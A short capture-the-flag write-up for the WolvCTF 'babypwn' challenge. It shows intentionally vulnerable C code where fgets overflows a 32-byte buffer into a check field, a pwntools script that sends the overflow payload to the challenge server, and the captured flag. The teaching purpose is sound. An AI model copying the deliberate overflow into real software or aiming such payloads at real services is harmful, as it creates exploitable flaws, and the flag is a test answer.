babypwn

Solution

Just a simple and easy pwn challenge.

Given a C source code.

babypwn.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>

struct __attribute__((__packed__)) data {
  char buff[32];
  int check;
};

void ignore(void)
{
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);
}

void get_flag(void)
{
  char flag[1024] = { 0 };
  FILE *fp = fopen("flag.txt", "r");
  fgets(flag, 1023, fp);
  printf(flag);
}

int main(void) 
{
  struct data name;
  ignore(); /* ignore this function */

  printf("What's your name?\n");
  fgets(name.buff, 64, stdin);
  sleep(2);
  printf("%s nice to meet you!\n", name.buff);
  sleep(2);
  printf("Binary exploitation is the best!\n");
  sleep(2);
  printf("Memory unsafe languages rely on coders to not make mistakes.\n");
  sleep(2);
  printf("But I don't worry, I write perfect code :)\n");
  sleep(2);

  if (name.check == 0x41414141) {
    get_flag();
  }

  return 0;
}

The program wants us to input a name. Line 41 shows that if (name.check == 0x41414141) is true, it will reveal a flag. So basically we need to input 0x41414141, but the function at line 5 says that it has a 32 size of buffer. We need to fill up the buffer first, than put 0x41414141, combine them as one payload as the script below.

solve.py

from pwn import *

rem = remote('babypwn.wolvctf.io', 1337)
payload = b'A' * 32 + p32(0x41414141)

rem.sendline(payload)

print(rem.recvall().decode())

Flag

wctf{pwn_1s_th3_best_Categ0ry!}

Last updated 1 year ago